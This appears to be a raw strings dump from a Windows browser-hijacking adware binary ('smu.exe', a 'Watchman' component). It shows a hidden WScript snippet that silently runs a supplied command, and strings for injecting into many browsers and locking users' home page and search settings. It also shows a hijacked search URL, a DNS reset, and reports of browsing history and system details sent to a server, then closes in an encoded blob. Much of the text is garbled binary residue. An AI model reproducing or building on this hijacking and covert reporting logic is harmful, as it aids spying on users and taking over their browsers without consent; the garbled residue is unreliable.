<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

</assembly>PADif (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i < n;   i)

args.push(WScript.Arguments(i));

var path = "\""   root.replace(/\\*$/, "").replace(/\//g, "\\")   "\"";

path  = " \""   args.join("\" \"")   "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

0%0 01070

2(2-272[2

3#3-323<3`3

8„8C8[8

5)686=6{6

2%2U2h2

4%4u4|4

0(0;0`0}0

5&515?5[5

6'626@6\6{6

!00050=0

2,2U2f2x2

4)545?5|5

<'<0<;<`<

11\1{1

;7;<;[;`;

0!030`0}0

50656=6|6

7$7-787]7

6!6)6:6~6

2$3(3,3034383<3@3

7"7(7,7:7

1"2-2H2Q2}2

5(5!9&939

9!9(9/959

4W5D5

6q7:7]7

0
0=0`0

<&<2<;<^<

4L4j4

: :$:0:4:8:

2 2$2(2,2024282<2|4

8$8(8,8084888

= =$=(=,=0=4=8=<=

? ?$?(?,?0?4?8?

> >$>(>,>0>4>8><>

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking<Parameter.Input>

Checking<Parameter.Key>

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Google\Chrome

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation<ExecutionContext>

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\firefox.exe

E:\opera.exe

E:\Safari.exe|E:\navigator.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\browser.exe|E:\Maxthon.exe|E:\sbframe.exe|E:\avant.exe|E:\dragon.exe|E:\bobrowser.exe

smei32.dll

smci32.dll

smfi32.dll

smoi32.dll

smri32.dll

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

127.0.0.1

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

Result.Hash:

[ReportBuilder::MakeHistoryReport]

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

History Report:

[ReportBuilder::MakeReport]

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

777705555443332

5555443332

5555443332

Utils::MachineKey::Create

Utils::MachineKey::Generate

Encrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::SendReport

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ReportBuilder::Create

Result.Report:

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

Package url:

WatchmanKey::Updater::SetLastTime

.Service

\Microsoft\Windows\Start Menu

*.lnk

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

/report

/report1

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

UrlSetID:

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Full url:

Data url:

sbu.exe

smw.sys

wscript.exe

smhe.js

[Monitor::WatchmanGuard::SendReport]

InstallReporter

Monitor::ServerReporter::Create

Monitor::ServerReporter::SendInitialReport

/urlset:

Options.InjectAllBrowsers:

Options.InjectDefaultOnly:

Options.ServiceName:

Options.ProductCode:

Options.ProductPriority:

Options.EnablePinner:

Options.EnableRedirect:

Options.EnableYellowBandSuppression:

Options.UpdateUrl:

Options.ReportUrl:

Options.AutoStart:

Options.ProtectSearch:

Options.ProtectHome:

Options.ProtectTab:

Options.ExplorerInjection:

Options.ChromeInjection:

Options.FirefoxInjection:

Options.OperaInjection:

Options.ConfigPath:

Options.ConfigKey:

Getting current URL Set

Getting URL Set from options

] Provided. And is different from current URL set [

URL Set [

Need to send report!!!

ServerReporter::Create

Original report URL:

URL to use:

ServerReporter::SendInitialReport

general_config.xml

system_config.xml

[WatchmanInstaller::SendReport1]

iexplore.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

ServerReporter::SendRegularReport

[WatchmanInstaller::SendReport]

ServerReporter::SendHistoryReport

Currently set URLSet:

Updating system config with new URL set...

Already reported duiring first install

Report' been sent:

WatchmanInstaller::SendReport1

calling SendReport1...

WatchmanInstaller::SendReport

[Monitor::WatchmanMonitor::CreateSendReportTask]

SendReportTask

new<SendReportTask>

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportFailed]

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

User has changed the chrome protection for:

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

User has reset the firefox protection:

Next report task:

Scheduller::RegisterTask<SendReportTask>

Monitor::Application::EnsureSystemKey

Options.Revert:

Settings.Final:

UninstallReporter

profiles.ini

prefs.js

Mozilla\Firefox\

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::ParseProfiles]

[Firefox::InstallInfo::QueryProfiles]

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ParseProfiles

[Firefox::InstallInfo::Query]

SHELL32.DLL

No profiles found! Maybe - first start of Firefox?

ADVAPI32.DLL

shlwapi.dll

Utils::Registry::OpenKeyExW

Subkey:

[Utils::Registry::RecursiveDeleteKeyW]

SHLWAPI.GetAddressOf<SHDeleteKeyW>

WKERNEL32.DLL

VERSION.DLL

NTDLL.DLL

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::SpawnProcess]

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::SpawnProcess

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Wait]

Utils::PipedProcess::WriteProc

[Utils::PipedProcess::WriteData]

Utils::PipedProcess::ReadProc

[Utils::PipedProcess::ReadData]

.cache

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

ntdll.dll

Could not create memory object. Object name: %s. %%s

Could not open memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not create sync object for memory. Object name: %s. %%s

pathToSignedProductExe

SELECT * FROM Win32_OperatingSystem

A[BrowserHistory::GetPropertyReport]

Found URL:

GIPHLPAPI.DLL

GX-hX-hX-XX-XXXXXX

\\.\pipe\

Could not create thread event. %%s

Could not create new client event. %%s

Could not create accept thread. %%s

Could not create work thread. %%s

Could not start thread. %%s

Stop IPC error. %%s

Pipe (0x%X) read problems. %%s

IAction::QueryInterface<IExecAction>

IExecAction::put_Path

IExecAction::put_WorkingDirectory

IExecAction::put_Arguments

Ghttp\shell\open\command

Software\Microsoft\Windows\CurrentVersion\App Paths

[Utils::SoftwareInfo::GetHttpOpenHandler]

Utils::Registry::OpenKeyW

[SynchronousPipe::Write]

[SynchronousPipe::Read]

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Not enough memory. Size: %s (%s)

Error code: %u ('%s')

Could not allocate IPC memory. Requires size: %u

Could not create pipe. %%s

Could not create pipe event. %%s

Event error. %%s

Pipe connecting error. %%s

HCould not create IPC event. %%s

yIEXPLORE.EXE

SuggestionURL

FaviconURL

TopResultURLFallback

Software\Microsoft\Internet Explorer\AboutURLs

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Failed to call enum URL's. Error:

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Monitor::RestoreData::Controller::Build<ChromeSettings>]

[Monitor::RestoreData::Controller::Build<FirefoxSettings>]

[Injection::Snapshot::Builder::BuildSettings<ChromeSettings>]

[Injection::Snapshot::Builder::BuildSettings<FirefoxSettings>]

new<ChromeSettings>

Injection::Snapshot::Parser::Parse<ChromeSettings>

new<FirefoxSettings>

Injection::Snapshot::Parser::Parse<FirefoxSettings>

ReadStringNode<AboutTabsUrl>

[Injection::Snapshot::Parser::Parse<ChromeSettings>]

ReadStringNode<DefaultProviderKeyword>

[Injection::Snapshot::Parser::Parse<FirefoxSettings>]

[Injection::Snapshot::Controller::IsChromeInstalled]

Chrome::BrowserSettings::Create

[Injection::Snapshot::Controller::IsFirefoxInstalled]

Firefox::BrowserSettings::Create

Chrome::BrowserSettings::RestoreState

Firefox::BrowserSettings::RestoreState

Argument.SystemConfig:

Argument.Config::General:

Argument.Config::User:

Chrome::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Argument.UserSid:

WatchmanKey::Users::SaveRestoreData

[WatchmanKey::GetEncryptionKey]

MachineKey::Create

MachineKey::Generate

[WatchmanKey::CleanupKey]

[WatchmanKey::LoadEncodedData]

WatchmanKey::GetEncryptionKey

[WatchmanKey::SaveEncodedData]

[WatchmanKey::System::LoadGeneralConfig]

WatchmanKey::System::Open

WatchmanKey::LoadEncodedData

[WatchmanKey::System::SaveGeneralConfig]

WatchmanKey::System::Ensure

WatchmanKey::SaveEncodedData

[WatchmanKey::System::LoadSystemConfig]

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::Users::Ensure]

WatchmanKey::EnsureKey

[WatchmanKey::Users::Open]

WatchmanKey::OpenKey

[WatchmanKey::Users::LoadConfiguration]

WatchmanKey::Users::Ensure

[WatchmanKey::Users::SaveConfiguration]

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::TimeBomb::Uninstall]

WatchmanKey::SystemKey::Open

smod.xml

SearchModulePlus.crx

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

DATAMNGR.DLL

IEBHO.DLL

[Config::General::UrlSet::Copy]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::Settings::Copy]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Firefox::Settings::Dump]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Opera::Settings::Dump]

[Config::General::Opera::Settings::Copy]

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseOperaSettings

ReadStringNode<StartPageUrl>

lReadStringNode<AboutTabUrl>

ReadStringNode<SearchScopeUrl>

ReadStringNode<SearchScopeIconUrl>

ReadStringNode<SearchScopeSuggestUrl>

[Config::General::Parser::ParseChromeSettings]

MissedElement<GoogleChrome>

Config::General::Parser::ParseChromeValueSets

[Config::General::Parser::ParseChromeValueSets]

ReadStringNode<HomePageUrl>

ReadStringNode<DefaultProviderSearchUrl>

ReadStringNode<DefaultProviderIconUrl>

ReadStringNode<DefaultProviderSuggestUrl>

[Config::General::Parser::ParseFirefoxSettings]

MissedElement<MozillaFirefox>

Config::General::Parser::ParseFirefoxValueSets

[Config::General::Parser::ParseFirefoxValueSets]

ReadOptionalStringNode<HomePageUrl>

ReadOptionalStringNode<SearchPluginUrl>

ReadOptionalStringNode<SearchPluginSuggestionUrl>

[Config::General::Parser::ParseUrlSet]

MissedElement<UrlSet>

ReadStringNode<TabPageUrl>

ReadStringNode<SearchEngineFaviconUrl>

ReadStringNode<SearchEngineSuggestionUrl>

ReadStringNode<SearchEngineSearchUrl>

dReadStringNode<SearchEngineKeyword>

[Config::General::Parser::ParseOperaSettings]

MissedElement<Opera>

yReadStringNode<Key>

[Config::General::Builder::Build<ChromeSettinsg>]

[Config::General::Builder::Build<FirefoxSettinsg>]

[Config::General::Builder::Build<OperaSettinsg>]

We couldn't find the URL Set section... probably an old configuration!

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::SaveGeneralConfig

JReset-2.1.0.7

2.1.0.7

2.0.0.0

ReadOptionalStringNode<UrlSet>

ReadStringNode<UpdateUrl>

ReadStringNode<ReportUrl>

ReadBooleanNode<GoogleChrome>

ReadBooleanNode<MozillaFirefox>

ReadBooleanNode<Opera>

Could not find URL Set in configuration. Probably older configuration.

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::SaveSystemConfig

[Config::User::Chrome::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseFirefoxSettings

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Builder::BuildChromeSettings]

[Config::User::Builder::BuildFirefoxSettings]

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::SaveConfiguration

CChromeExtension::GetFileListInExtenstion

GCHROME.EXE

__MSG_

manifest.json

messages.json

WebData

[Chrome::BrowserInfo::Query]

Google\Chrome

\Application\chrome.exe

\Google\Chrome\Application\chrome.exe

\resources.pak

\Google\Chrome\Application\

\Web Data

[Chrome::BrowserSettings::OpenConfigFiles]

Chrome::InstallInfo::Get

SQLite::WebDataDB::Create

[Chrome::BrowserSettings::SetHomePagePreferences]

Argument.HomePageUrl:

Argument.HomePageIsNewTabPage:

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

Argument.DefaultProviderId:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderName:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderSearchUrl:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderSuggestUrl:

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

Argument.RestoreOnStartup:

Argument.UrlsToRestoreOnStartup:

[Chrome::BrowserSettings::GetSearchProviderId]

Argument.KeywordToSearch:

SQLite::WebDataDB::GetFirstProviderId

SQLite::WebDataDB::GetProviderById

Result.ProviderId:

[Chrome::BrowserSettings::EnsureSearchProvider]

SQLite::WebDataDB::Values::Create

[Chrome::BrowserSettings::DeleteSearchProvider]

Key deleted:

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::RestoreState]

Chrome::BrowserSettings::OpenConfigFiles

Chrome::BrowserSettings::DeleteSearchProvider

SQLite::WebDataDB::SetDefaultProvider

[Chrome::BrowserSettings::PropagateState]

Chrome::BrowserSettings::EnsureSearchProvider

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetProviderId]

Lchrome-extension://

13050095043000000

4BB42133-5533-4A0C-BF72-F1B8C8776A11

Checking<extensions.settings>

Opera Software\Opera Stable\

\Opera\launcher.exe

\opera.pak

\Opera\

Web Data

\resources\default_partner_content.json

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::PropagateState]

Software\Microsoft\Internet Explorer\URLSearchHooks

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

Argument.SearchScopeToSearch:

Result.SearchScope:

[Explorer::BrowserSettings::DeleteKey]

Argument.Parent:

Argument.Subkey:

VirtualSpeedbitSearchScopeKey::EnsureKeyW

SuggestionsURLFallback

SuggestionsURL

FaviconURLFallback

TopResultURL

KERNELBASE.DLL

smu.exe_772:

.text

`.rdata

@.data

.rsrc

@.reloc

FTPj

E@PSSh

 1 23 456

Jx.SHx

.TxK%Yx

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.1.9.476

smu.exe

Chrome

Report.xml

/Url:

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

3.7.2

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYo

inflate 1.2.3 Copyright 1995-2005 Mark Adler

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

?456789:;<=

!"#$%&'()* ,-./0123

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

NtQueryKey

1.3.6.1.4.1.311.2.1.12

Snapshot.xml

GoogleChrome

MozillaFirefox

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

GvrV5 fIBwR5G1CQDyLsic/pOLfRYKAGRyMxV8NxzSLudH5dYJ7ItKYE7rC1AC99X2kzxEChSNvkXetV0jCmjqUjmvO10UOWty3ApOQucR/hia9cu3H02a 5R CG5qhR8Y/uzTzzCr4GfPZ8D8t88yUqyCjdTSd8VRzWUuml0XIRmAC3mIaIBnS0qtpU54eeMa P511PX57TteCBWpQr UysHS8QouOBFyhBBaanipF1PUZ8zItL9IeCtaFExJDKcxi7FU7dmU7ctk7EMZZR3AC3j7jgcRnxrBRdeCW5PDYDKjcHmxPGAZm ePsRg6dCH9XvAsXiSqWsGTuCaJydkQ6BC6sdjbBYCQUNu0nP10JlSn5NzpucbmEgVB1WLSsSDe9vYbtKTOOJRR/CGu7qSqmZ1YxAdjnPMshzg FPfycjHdyERU/SZHvERWXU9WjRnocOXQbT0XOzcBQYfdCa3hiBDgamllsamooTTof6lK6Zb2EYpLiqRQU8WOQCSQu3D2YDP5v9J1Ah7R5gFH4pWrujpklOckba/Bhit29bHcRVAi6mCX5DamNCUq4tY5YMLWVOyVlPLgnZ2 AoHHhCVzsJqNqYZAEseYuauz5gxxhiozc82QCxEJsH2wDGV4Fnf8fmimJyQybsVBebTkkGhRnXfu0YEB4r2oBX3lttd09zG gE2dSUZsHBBBRwvxpM1HoEdvDeLKIaszMpTdRi5i9Rjlxfi9Gpe0mMgvRgepguez9/DfrgUpCVpjnmdNa5TuEirTy3 3mUWdojeY6y8tNBJLsyaj2cmjca3wiE/pLENTnow dbju2fmW9Odso8GLznFwJ6v7o aa2XPOVqX1qryZzbVRaYkdUtOZwrz3FBq1reAfrk12qBENZPPGH8qFcC1Xta09MnkMdxGwD1VeVH6y1RoVkpTPp8mumzKWoXv9DMFPLowiUNgpG22Ss2Vl3szBKCiwYupVQT1GMO/8/psE5WgwQjj9GkHyf3qsI7DSk3d1tp6LFKIdpFPw1fKx72Xwkee0n1T14ksSGewLuCI5WBuOqSexXFXKxmwFhXlCqivfRWSmIJP3ILQrfZbdILbXlwYfOJaoFIMMzCvlMq1hNa/26crmnuBXd8PAHYi5oF Ezzi28v/GmzOTan5Inj1p29ta/WyOajmdLkVPj/Ff/85EnaiNPV62/inI0Y G cikLBu94xgMNywTIn0iSo0A2A5zcNR0/W3DEqGCgbVHqqqN7oxy08Qx5h2gnrOB oSz4TfhJ72enIju7sYLTxMA7kHQzi1uY89QwqJ0lVbA0qUWOVGk3mHyuDH6s6ZsaVE21RT7iGvRc QmQG7X0EwDW3iK5YkiyDUwVzhYEGWfcbv2oR3qOQQDzTqwWYUeFmo0zKzQ86B08jN52EcuOE/ZCkLYCStfmrxhGiipXWbEWtFa973DaRy3KrobC50pz6S4AQ Xu9RlrutYMXGmRg/8hI08I4xW5uWRoMqVCLBcPq478k/Ez1Iuvw3JZBa5n3BHwmUosLcnRRpHWRptiZlKMNviUquLgwrIMhacWmDWX6DGjZz72knZzg3qzYwKatnnRjfEtXRrxXq5dKWE8P/XvlVCstT/qYqNm964Oc46C0p/j6M59qVRvkUnAZuZKVVXVc04fSy4FjvJzrD5LfXxpYA7lBFQ60fZYVir 54eC83A5L9BfivvGlwewWfWS5racrcSmF5nYMxn3f8EjwkuZK91BRZlAPdRAg1gfb2ohlntdntu/8x6g1Fph870zNk13u7LFWihV1csZZqZaKcf8uHi wLKouWpmT1vhCNR07YaH6glQvRnt556rVJvZWmKsVI D11NhFxQLUCKde TCvcZ9s8s2wVPTRW5ahtdYOUnZTFvHHm6WxjtFCc nNYa9LXYdoHnqQQbbKdnkYE3sY0r1cUZAZcLNGx7JjJlAz wLhxfvJ5Se6MsCoFx4tMQppa5N4IrcPL90Nqa0IehVmEvHvCsO96nwiOiJpFF5Rng8RAqrvnP7fJBgG grlD9sfim7R2LOvb8LIeDb/HkDwIOy0Ypq2WpWoj2sTSzv4LQeLmJnKqL8dPxNApEeCe/on90DLRH/7K2BOfAj4xNnkG8Wurgv8Aq205ha0rLU9c3fMu9qrSi/Lbh E5HwYMA/tzBwF6ZXR99yS0gt mz6yNCN8w9wK3 0cO6uoanOjzCCxkuXpkyIU5hIi4/aW0TS2NlDFlvgPs37FyXA3rM0rHHeEds6 N2YImzYWB45i3GqILHKLBnTYfsLAUMKSLqWFcSqlD2EAOJbgUN2dhhIZd8JSqHyltvUyR8fGRbT8H1C6lFlFw6TCxTjkY7hSGOB6CqzEs33tkr55PJUiBsU lrpTQX7T29psodMnih9sC97Wb6zIFJyIfIoxaxbcC411rqyJV WlRazWlP9dmcgd2KEqEuh HIGycoc6a74vp4I1eVo4j1DXtAbXnHEj/Nzk4NsFusbI9x9r8yoJGsAjKACoQqPoqgY6Nh6OgOPbqO0KcFE6RykrPzFDk087OfMz9xiaFrZcW9VdEoOGStbeIbQ61UbyXpHDkUpxIwy4WM6Q9jKdPcTJ3aBz3FCcdefxnGRHHeQ/TqrwU4zZ7WYikjCOoz6MLXTYdCCnrllA//dUk4rwM1HWaGHEMhUdSy8hKAd5bLH9JrVLB06axRgBYkgEfMAtdk/nTZwNFANA3xxxsjmlKtAzYNMpGhR5Jt2gs wEJKr3LF4mYqDxTmRdmxZzTSVlyupVv4c9WZc 5yFM63XebcscL6A4Vnd3tBpJCwY7BQj/INn 6L4DYFeEPAk3u56A6Idj9m5n3G8ElGy2ioOO5NLlT2BbQaf ydP 9doEgUl5I8vsvV3drtRmh8NlZTBnor4rhMg/5817TDiQOHVX/6ICKz8QAQ1qXh7rzHRgxv7l4hHdXC4BGHwimaD0vYdupfNiXOzJcR9Zi2FrL85kXZm/pKyAcUuT4mzwjvKHO8APVYBS3WPir7VT2GFuHIUk1jJdNzKYgPjW22pzqdWXzPCSwjqDtq1qci7tqa/iOikTtCsTOpe AtNDxBDyzbGRaGFRyDRmXf33o2wcd//5IkfU7zQDa8WdYYUqsJynEUW42wWLV2nfjyqvreKblZDfYXn7THCHpV FJqIA6QA3pVD/Iu4KCRWdwZhmGMf5115QF0A6wrHoiZr/C/c/ZzCzFd9AGd0/X/RXx5kAb/zSif FfHcxHpQ1pq956dBZ1KjZrY9PyxZF/uA8rHRCmaSGD4KhAwxA/T36fiLBJIvl YXdITmqH9g nng7f45Zi7UUvzZxHqetki8rZ VsWB0xM9f7cSEmyvDEqfhNKYT P/d8P9NRwv9pUx8RxruqBWYeyfeSKjB j97YTQCVG7lhvWt9SPacgGMHYQuR8YiGg3n/fKOacQ7XY7aXdMHYubFWgoTODW1TvMnTvo9KyKdcPRIZQLlODCSK2cA1/R AIojRwIFEU3gXLsC9CzL9TEeGdDnmnpTjRR/oc4fnDwiFdwh1sts7dbUU/MKxC0vIxSqTJ Bm5RJuCOUcCIOEALJ suBTJvj4EmrcgctR6ryJKkGlDzGLrLWgyK0pY776i MXQ6AA3wbM3ZQi75onR2vwCjgg8UQv5DMcP6HUM17MXCEHdbIEUvhJAKDZ6LGKfkP96HQrEgqjjsj97SZh YcQTzaR0M7JY3K3RwE/Oqv8BkWJMrOL1Mnhg vKtsNcwhtpUsBwrBgu3JrXbI/x0dho12ZuysjpUNiI7l8TVGCz00XXU0TNrucXvRe0z35rEpiTe9S/xdMqSDXmdGPz0VAHnfSf7GAckWfA3cfc6 fK3empP1a92e LLSpLJ eMrocYgVIvvo3sTpDaXWjQTa02srQEfZ9IFEOoEy3hYk1SzsXYanCd2UpHfsIHUn7A6Q5RL6kWAZXZjwXvcyDAd/iE/QmFFsENOkaEHNg5OVQeNkq6yEZdfdzPkkTSoD4ztUHEJpeNg66Z9bb085oS J3S42RvycdQGnk5Oi5IEzP24pIdF j3sKq17UXVbyMFHV8lOjWSlh1Y0Kq937bvGCBsnRwVwsXGaLrE0r4tLCj m5AR2mFP4JZKENROWGtv3BprlrMyW6uvd5XSKuyvDiHUpXC6X9vrBPdjhmY u1Ix3RLWWPyTlPNW9REKmk L6jtTqOdXQBBY6llXsDP GxJn/t1uTRSFktjf19T8K50owKGTnlhpUoqBt9WVKYR6YyGit8Mk9OX/kVR75EdE/t/VVSU/iQ4d3nFk75apgn3VoMIbDYB0MU7nPdwWV4Bw3vs2RpHTpOtd1ALNwE2rqG4GkKoTSlO7r7pf/7JUPLCEJ3MTmW ertKdGAF44MJoB5oJUC7cRpKE1GGYau4eKBe29fIMqabrVr6QSkkptljw8q6a9b0s51CNzKlcCEcnJ7cb8LzsVCoGFhsnLlYPtWEiZHnck3lMYWn 3dXBSbWlR5w4LH5uACO4/rhbVUD4ucX8Q3I xuwLg6D9pwjadqdcdeihP/dYMvbQkdRk/tNAX0NaFWMR/HAAIfPoqp/1rr1gRVssVKEiGD5sEAwe6oTJDXp53arWV3D/D5vn5IujBQ 2rnEYYUHXiy8l1JERR4rjNA7DT12jpOMT0jMd3iVIUBUj1mzjGZXIzrf1f/a31pbSCu 0xzo QvEihKjVfvV3OARI6o/U01YFNMB9PVBsYErGfiDd63JVmt3N8qLiFu9vjgbuR8v1Rqn6xhFt/268gxSnx6tR6RFkFakyk6xOIaoJqswSm7afKhThe55zMkJ1PXHaus/uKqhRKSx4PeLqR FvkdLVc1JiARy7RTdtBf4Bb2EFW11 XM3gU54DShNFXlldANcdZN6m/SO8vvJk2D45MvLWXyNVpppvdKfZ8gxSFna86neYQQ5MDbA2ybUl7PMmpMhipbx4u11sXUrkPb1krAEmlZe8b0NidLcTj9VOBgLD1OGyOnG 6iwNfShAh8UxAiZdQsOW7WkEAhvQWcu8F7zEZv1/RgOnyZj8h3NoufhlpqLWpBDf1Yn2TzN3mCKZZVtLWxoUGYN5hKFOHNw 